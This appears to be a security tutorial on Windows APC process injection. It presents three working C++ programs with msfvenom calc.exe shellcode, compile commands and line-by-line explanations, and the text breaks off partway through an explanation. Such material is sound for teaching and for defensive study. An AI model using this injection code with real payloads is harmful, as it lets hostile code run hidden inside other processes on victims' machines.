What is APC Injection?

  • Every thread in a Windows process has a private list (or queue) where APC (Asynchronous Procedure Call) functions can be stored, waiting to be executed.
  • If a program wants a thread to run some extra code (an APC), it calls the QueueUserAPC function to add that APC to the target thread’s queue.
  • When calling QueueUserAPC, the program must tell it which function to execute (by giving the function’s memory address or pointer).
  • This just means that by adding the APC to the thread’s queue, you’re asking the thread to run that function, but it won’t happen right away. It only happens when the thread enters an alertable wait state (e.g., using SleepEx() or WaitForSingleObjectEx() with alertable flag).

Simple Technique


Code

//ACPInjection.cpp
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
 
// calc.exe payload
unsigned char my_payload[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
/*
 * Demo entry point: starts notepad.exe in a suspended state, copies
 * my_payload into the new process, queues the copied buffer as a user APC on
 * the new process's primary thread, and then resumes that thread.
 *
 * Returns 0 unconditionally.
 *
 * NOTE(review): none of the Win32 calls below have their result checked, and
 * pi.hProcess / pi.hThread are never closed before returning.
 */
int main() {
	// Create a 64-bit process:
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	LPVOID my_payload_mem;
	// my_payload is initialized from a string literal, so sizeof also counts
	// the literal's implicit terminating NUL byte
	SIZE_T my_payload_len = sizeof(my_payload);
	LPCWSTR cmd; // NOTE(review): never used in this function
	HANDLE hProcess, hThread;
	NTSTATUS status; // NOTE(review): never used in this function
	
	// zero both structures, then set the one field that is filled in by hand
	ZeroMemory(&si, sizeof(si));
	ZeroMemory(&pi, sizeof(pi));
	si.cb = sizeof(si);
	
	// CREATE_SUSPENDED: the child's primary thread does not run until ResumeThread below
	CreateProcessA("C:\\Windows\\System32\\notepad.exe", NULL, NULL, NULL, false, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
	// NOTE(review): a process handle is presumably only signaled when the
	// process exits, so with the child still suspended this looks like a plain
	// 5000 ms delay — confirm and consider removing
	WaitForSingleObject(pi.hProcess, 5000);
	hProcess = pi.hProcess;
	hThread = pi.hThread;
	
	// allocate a memory buffer for payload
	// (inside the child process, readable + writable + executable)
	my_payload_mem = VirtualAllocEx(hProcess, NULL, my_payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	
	// write payload to allocated buffer
	// (last argument NULL: the number of bytes written is not requested)
	WriteProcessMemory(hProcess, my_payload_mem, my_payload, my_payload_len, NULL);
	
	// inject into the suspended thread.
	// the remote address is first typed as a thread-start routine and then
	// cast again to PAPCFUNC, the type QueueUserAPC takes; APC argument is 0
	PTHREAD_START_ROUTINE apc_r = (PTHREAD_START_ROUTINE)my_payload_mem;
	QueueUserAPC((PAPCFUNC)apc_r, hThread, 0);
	
	// resume the suspended thread
	ResumeThread(hThread);
	
	return 0;
}

Explanation

#include <windows.h>

windows.h is a Windows-specific header file that lets your program use the Windows API — which is a massive collection of functions Microsoft provides for doing stuff on Windows.


#include <stdio.h>

<stdio.h> stands for Standard Input Output Header in C and C++.

It provides functions for basic input and output, like:

| Function | What It Does          |
|----------|-----------------------|
| printf   | Print to console      |
| scanf    | Read from user input  |
| fopen    | Open a file           |
| fread    | Read data from a file |
| fwrite   | Write data to a file  |
| fclose   | Close a file          |

#include <stdlib.h>

<stdlib.h> stands for Standard Library header in C/C++. It gives you access to general-purpose utility functions — especially for:

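| Category        | Example Functions     | Purpose                           |
|-----------------|-----------------------|-----------------------------------|
| Memory          | malloc, free, realloc | Dynamic memory allocation         |
| Process control | exit, system, abort   | Terminate program or run commands |
| Conversions     | atoi, atof, strtol    | Convert strings to numbers        |
| Random          | rand, srand           | Generate random numbers           |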

unsigned char my_payload[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; 
  • Shellcode that launches calc.exe (CMD is the msfvenom option that names the command to execute; it does not mean the command prompt).
  • Generated with command :
    msfvenom -p windows/x64/exec CMD=calc.exe -f c

STARTUPINFO si;
PROCESS_INFORMATION pi;
  • STARTUPINFO si: Structure used to specify window appearance and handle inheritance for the new process.
  • PROCESS_INFORMATION pi: Structure to receive info about the created process (process handle, thread handle, etc).

LPVOID my_payload_mem;
SIZE_T my_payload_len = sizeof(my_payload);
  • LPVOID my_payload_mem: Pointer for memory allocated in the target process.
  • SIZE_T my_payload_len = sizeof(my_payload);: Gets the size of the shellcode payload.

LPCWSTR cmd;
HANDLE hProcess, hThread;
NTSTATUS status;
  • LPCWSTR cmd: A pointer to a wide (Unicode) string, typically a command line. It is declared here but never used.
  • HANDLE hProcess, hThread: Handles to the created process and its primary thread.
  • NTSTATUS status: A variable for an NT status code (for error checking). It is declared here but never used.

ZeroMemory(&si, sizeof(si));
ZeroMemory(&pi, sizeof(pi));
  • ZeroMemory(...): Sets all fields of the structures to 0 to avoid garbage values.

si.cb = sizeof(si);
  • si.cb: Specifies the size of the STARTUPINFO structure (required by CreateProcess).

CreateProcessA(
  "C:\\Windows\\System32\\notepad.exe", // application to run
  NULL,                                 // command line (no args)
  NULL, NULL,                           // no process/thread security attributes
  false,                                // do not inherit handles
  CREATE_SUSPENDED,                     // start the process in suspended mode
  NULL, NULL,                           // no environment, current directory
  &si, &pi                              // startup info, process info
);
  • CreateProcessA: Creates a new process in suspended mode (so we can inject shellcode before it runs).
  • The target: "notepad.exe" is a harmless process often used in injection demos.
  • CREATE_SUSPENDED: Ensures the main thread is paused right after creation.

WaitForSingleObject(pi.hProcess, 5000);
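  • Waits up to 5 seconds for the process handle to become signaled, which only happens when the process exits.
  • Here it is unnecessary: the process was created suspended and will not exit, so the call simply blocks for the full 5 seconds and then times out.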

hProcess = pi.hProcess;
hThread = pi.hThread;
  • Stores the handles to the process and primary thread for later use.

my_payload_mem = VirtualAllocEx(
  hProcess, NULL, my_payload_len,
  MEM_COMMIT | MEM_RESERVE,
  PAGE_EXECUTE_READWRITE
);
  • VirtualAllocEx: Allocates memory inside the target process.
  • MEM_COMMIT | MEM_RESERVE: Reserves and commits memory.
  • PAGE_EXECUTE_READWRITE: Memory is readable, writable, and executable, so shellcode can run from it.

WriteProcessMemory(
  hProcess,
  my_payload_mem,    // destination in target process
  my_payload,        // source shellcode
  my_payload_len,
  NULL               // optional: bytes written (not needed here)
);
  • Injects the shellcode into the allocated memory of the notepad.exe process.

PTHREAD_START_ROUTINE apc_r = (PTHREAD_START_ROUTINE)my_payload_mem;
QueueUserAPC((PAPCFUNC)apc_r, hThread, 0);
  • PTHREAD_START_ROUTINE: A function pointer type for thread entry functions.
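  • QueueUserAPC(...): Queues the shellcode as an APC on the still-suspended primary thread. The APC does not run at this point; it runs once the thread is resumed, because a thread calls NtTestAlert to execute any pending APCs before it starts executing its Win32 start address (see the "With NtTestAlert" section).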

ResumeThread(hThread);
  • Resumes the main thread of notepad.exe, which now executes the queued shellcode.

Compile

x86_64-w64-mingw32-gcc ACPInjection.cpp -o ACPInjection.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

Run

On windows 7 x64:

.\ACPInjection.exe


With NtTestAlert

  • NtTestAlert is an undocumented function.
  • NtTestAlert is a system call related to the alert mechanism of Windows. It can cause execution of any pending APCs the thread has. Before a thread starts executing its Win32 start address, it calls NtTestAlert to execute any pending APCs.

Code

//nttestalert.cpp
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ntdll")
// Function-pointer type used to call NtTestAlert after resolving it at run time:
// takes no parameters, returns NTSTATUS, uses the NTAPI calling convention.
using myNtTestAlert = NTSTATUS(NTAPI*)();
 
// calc.exe payload
unsigned char my_payload[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
/*
 * Demo entry point: copies my_payload into an executable buffer in the
 * current process, queues that buffer as a user APC on the current thread,
 * and then calls NtTestAlert (resolved from ntdll at run time).
 *
 * argc/argv are accepted but not used. Returns 0 unconditionally.
 *
 * NOTE(review): no result is checked below; in particular testAlert would be
 * a null function pointer if GetProcAddress failed, and my_payload_mem would
 * be NULL if VirtualAlloc failed.
 */
int main(int argc, char* argv[]) {
	// my_payload is initialized from a string literal, so sizeof also counts
	// the literal's implicit terminating NUL byte
	SIZE_T my_payload_len = sizeof(my_payload);
	// look up NtTestAlert by name instead of linking against it
	HMODULE hNtdll = GetModuleHandleA("ntdll");
	myNtTestAlert testAlert = (myNtTestAlert)(GetProcAddress(hNtdll, "NtTestAlert"));
	
	// local buffer, readable + writable + executable
	LPVOID my_payload_mem = VirtualAlloc(NULL, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	
	// copy the payload; the destination is this same process
	WriteProcessMemory(GetCurrentProcess(), my_payload_mem, my_payload, my_payload_len, NULL);
	
	// typed as a thread-start routine first, then cast to PAPCFUNC for QueueUserAPC
	PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)my_payload_mem;
	
	// queue on the calling thread itself; APC argument is 0
	QueueUserAPC((PAPCFUNC)apcRoutine,GetCurrentThread(), 0);
	
	// per the accompanying write-up, this call makes the thread run its pending APCs
	testAlert();
	
	return 0;
}

Explanation

#include <windows.h>   // Windows API functions (e.g., VirtualAlloc, QueueUserAPC, etc.)
#include <stdio.h>     // Standard I/O (not used, but included)
#include <stdlib.h>    // Standard library (not used, but included)
#include <string.h>    // For string functions (not used here)
#pragma comment(lib, "ntdll") 
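  • Tells the MSVC linker to link against ntdll.lib, the import library for ntdll.dll (the Windows NT Layer DLL). This program does not actually depend on it, because NtTestAlert is looked up at run time with GetProcAddress.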

using myNtTestAlert = NTSTATUS(NTAPI*)();

Defines a custom type myNtTestAlert which is a function pointer to a function that:

  • returns NTSTATUS
  • takes no arguments
  • uses the NTAPI calling convention (same as stdcall on Windows)

unsigned char my_payload[] = "\xfc\x48..."; 
  • This is raw shellcode that launches calc.exe.
  • Generated with command :
    msfvenom -p windows/x64/exec CMD=calc.exe -f c

int main(int argc, char* argv[]) {
  • Standard C entry point. Accepts command-line arguments.

SIZE_T my_payload_len = sizeof(my_payload);
  • Stores the size of the payload into my_payload_len.

HMODULE hNtdll = GetModuleHandleA("ntdll");
  • Retrieves a module handle (pointer) to ntdll.dll, which contains low-level NT APIs (like NtTestAlert).

myNtTestAlert testAlert = (myNtTestAlert)(GetProcAddress(hNtdll, "NtTestAlert"));
  • Uses GetProcAddress to find the memory address of the undocumented NtTestAlert function.
  • Casts it to the correct function pointer type (myNtTestAlert) and stores it in testAlert.

🧠 What does NtTestAlert do?

  • It causes a thread to check its APC queue and process any pending APCs.
  • By default, threads only check APCs when alertable waits happen.
  • NtTestAlert() forces that check — that’s the key trick here.

LPVOID my_payload_mem = VirtualAlloc(NULL, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  • Allocates memory with RWX permissions (which is suspicious to AV) and stores the pointer to my_payload_mem.

WriteProcessMemory(GetCurrentProcess(), my_payload_mem, my_payload, my_payload_len, NULL);
  • Writes the shellcode into the current process’s memory space (you’re injecting into yourself).
  • Technically unnecessary here — memcpy() would suffice — but this mimics the remote injection pattern.

PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)my_payload_mem;
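  • Defines a pointer of the thread-entry type PTHREAD_START_ROUTINE (a function that takes LPVOID and returns DWORD). This is not the APC signature: an APC routine has the type PAPCFUNC (it takes a ULONG_PTR and returns nothing), which is why the pointer is cast to PAPCFUNC when it is passed to QueueUserAPC.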

QueueUserAPC((PAPCFUNC)apcRoutine, GetCurrentThread(), 0);
  • Schedules your shellcode as an APC on your own thread.
  • But it won’t run immediately, it just gets queued.

testAlert(); 
  • This function forces the thread to check and execute any pending APCs including your shellcode.
  • This is the moment the shellcode runs and launches calc.exe.

Compile

x86_64-w64-mingw32-g++ -O2 nttestalert.cpp -o nttestalert.exe -mconsole -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive

Run

.\nttestalert.exe

Alertable threads

Here, we are going to see APC injection in remote threads.

  • Inject APC into all of the target process threads, since we can’t tell which ones are alertable. We just hope at least one of them is, so our code runs.

Steps:

  1. Find the target process id.
  2. Allocate space in the target process for our payload.
  3. Write payload in the allocated space.
  4. Find target process threads.
  5. Queue an APC to all of them to execute our payload.

Code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <tlhelp32.h>
#include <vector>
unsigned char my_payload[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00,
0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2,
0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7,
0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c,
0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52,
0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88,
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01,
0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49,
0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34,
0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0,
0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1,
0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0,
0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49,
0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41,
0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0,
0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff,
0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00,
0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0,
0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80,
0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a,
0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
0x63, 0x2e, 0x65, 0x78, 0x65, 0x00};
// Size of my_payload in bytes. The array is brace-initialized, so this is
// exactly the number of bytes listed above.
unsigned int my_payload_len = sizeof(my_payload);
 
/*
 * findMyProc - look up a running process by its executable name.
 *
 * Walks a Toolhelp snapshot of all processes and compares each entry's
 * szExeFile against procname with strcmp, i.e. an exact, case-sensitive
 * match on the file name only (e.g. "notepad.exe").
 *
 * procname: executable name to search for; may be NULL.
 *
 * Returns the process ID of the first matching entry, or 0 when procname is
 * NULL, the snapshot cannot be created, or no entry matches.
 */
int findMyProc(const char *procname) {
	HANDLE hSnapshot;
	PROCESSENTRY32 pe;
	int pid = 0;

	// main() forwards argv[1] without checking argc, so procname is NULL when
	// the program is started without an argument; strcmp on NULL would crash
	if (procname == NULL) return 0;

	// snapshot of all processes in the system
	hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (INVALID_HANDLE_VALUE == hSnapshot) return 0;

	// dwSize must be set before the first Process32First call
	pe.dwSize = sizeof(PROCESSENTRY32);

	// walk the snapshot until a name matches or the entries run out
	if (Process32First(hSnapshot, &pe)) {
		do {
			if (strcmp(procname, pe.szExeFile) == 0) {
				pid = (int)pe.th32ProcessID;
				break;
			}
		} while (Process32Next(hSnapshot, &pe));
	}

	// release the snapshot on every path that created it
	CloseHandle(hSnapshot);
	return pid;
}
/*
 * getTids - collect the IDs of every thread owned by a process.
 *
 * Takes a Toolhelp snapshot of all threads in the system and appends to tids
 * the th32ThreadID of each entry whose th32OwnerProcessID equals pid.
 * Existing elements of tids are kept.
 *
 * pid:  ID of the process whose threads are wanted.
 * tids: output vector that receives the matching thread IDs.
 *
 * Returns non-zero when tids is non-empty on exit, zero otherwise (including
 * when the snapshot could not be created and tids was empty on entry).
 */
DWORD getTids(DWORD pid, std::vector<DWORD>& tids) {
	THREADENTRY32 te;
	te.dwSize = sizeof(THREADENTRY32); // must be set before Thread32First

	// The second parameter is a DWORD process ID, not a pointer, so pass 0
	// rather than NULL; the owner filter is applied by hand in the loop below.
	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
	if (hSnapshot == INVALID_HANDLE_VALUE) {
		// nothing to enumerate and nothing to close
		return !tids.empty();
	}

	if (Thread32First(hSnapshot, &te)) {
		do {
			if (te.th32OwnerProcessID == pid) {
				tids.push_back(te.th32ThreadID);
			}
		} while (Thread32Next(hSnapshot, &te));
	}

	CloseHandle(hSnapshot);
	return !tids.empty();
}
/*
 * Demo entry point: resolves the process named by argv[1] with findMyProc,
 * opens it, copies my_payload into a newly allocated buffer in that process,
 * and queues that buffer as a user APC on every thread getTids reports for it.
 *
 * Returns -1 when findMyProc returns 0, -2 when OpenProcess fails, and 0
 * otherwise.
 *
 * NOTE(review): argv[1] is used without checking argc.
 * NOTE(review): the results of VirtualAllocEx, WriteProcessMemory and
 * QueueUserAPC are not checked; the "payload injected" message is printed for
 * every thread that could be opened, whether or not queuing succeeded.
 * NOTE(review): the indentation after the OpenProcess check is misleading —
 * everything down to CloseHandle(ph) is still inside the else branch.
 */
int main(int argc, char* argv[]) {
	DWORD pid = 0; // process ID
	HANDLE ph; // process handle
	HANDLE ht; // thread handle (NOTE(review): never assigned; shadowed by the loop-local ht below)
	LPVOID rb; // remote buffer
	std::vector<DWORD> tids; // thread IDs
	pid = findMyProc(argv[1]);
	if (pid == 0) {
		printf("PID not found :( exiting...\n");
		return -1;
	} else {
		// NOTE(review): pid is a DWORD but is printed with %d — confirm the intended format
		printf("PID = %d\n", pid);
		ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD)pid);
		if (ph == NULL) {
			printf("OpenProcess failed! exiting...\n");
			return -2;
		}
		
	// allocate memory buffer for remote process
	rb = VirtualAllocEx(ph, NULL, my_payload_len, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
		
	// write payload to memory buffer
	WriteProcessMemory(ph, rb, my_payload, my_payload_len, NULL);
	// queue the same remote address on each thread of the target process
	if (getTids(pid, tids)) {
		for (DWORD tid : tids) { 
			HANDLE ht = OpenThread(THREAD_SET_CONTEXT, FALSE, tid);
			if (ht) {
				QueueUserAPC((PAPCFUNC)rb, ht, 0);
				printf("payload injected via QueueUserAPC\n");
				CloseHandle(ht);
			}
		}
	}
	CloseHandle(ph);
}
return 0;
}

Explanation

#include <stdio.h>
  • Purpose: Includes the Standard Input/Output header.
  • Allows us to use functions like printf(), scanf(), etc.

#include <stdlib.h>
  • Purpose: Includes the Standard Library header.
  • Lets us use functions like malloc(), free(), exit(), system(), etc.

#include <string.h>
  • Purpose: Includes functions for handling C-style strings.
  • We can use strcpy(), strcmp(), strlen(), etc.

#include <windows.h>
  • Purpose: Gives you access to the Windows API.
  • Includes functions and definitions to interact with Windows OS (like creating processes, threads, memory handling, etc).

#include <tlhelp32.h>
  • Purpose: Includes definitions for Tool Help APIs.
  • We can use it to take snapshots of running processes, threads, and modules.
  • Useful for process injection, enumeration, etc.

#include <vector>
  • Purpose: Gives access to C++ STL vectors.
  • A vector is like a dynamic array that grows as you add elements.

unsigned char my_payload[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00,
0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2,
0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7,
0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c,
0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52,
0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88,
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01,
0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49,
0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34,
0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0,
0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1,
0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0,
0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49,
0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41,
0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0,
0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff,
0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00,
0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0,
0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80,
0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a,
0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
0x63, 0x2e, 0x65, 0x78, 0x65, 0x00
};
  • Shellcode that launches calc.exe (CMD is the msfvenom option that names the command to execute; it does not mean the command prompt).
  • Generated with command :
    msfvenom -p windows/x64/exec CMD=calc.exe -f c

unsigned int my_payload_len = sizeof(my_payload);

It calculates the total size (in bytes) of your my_payload array and stores that number into my_payload_len.

  • This line gets the size of the my_payload array.
  • It saves that size in my_payload_len.
  • Later, the program uses my_payload_len when allocating the remote buffer (VirtualAllocEx) and when writing the payload into it (WriteProcessMemory).

int findMyProc(const char *procname) {
	HANDLE hSnapshot;
	PROCESSENTRY32 pe;
	int pid = 0;
	BOOL hResult;
	
	// snapshot of all processes in the system
	hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (INVALID_HANDLE_VALUE == hSnapshot) return 0;
	
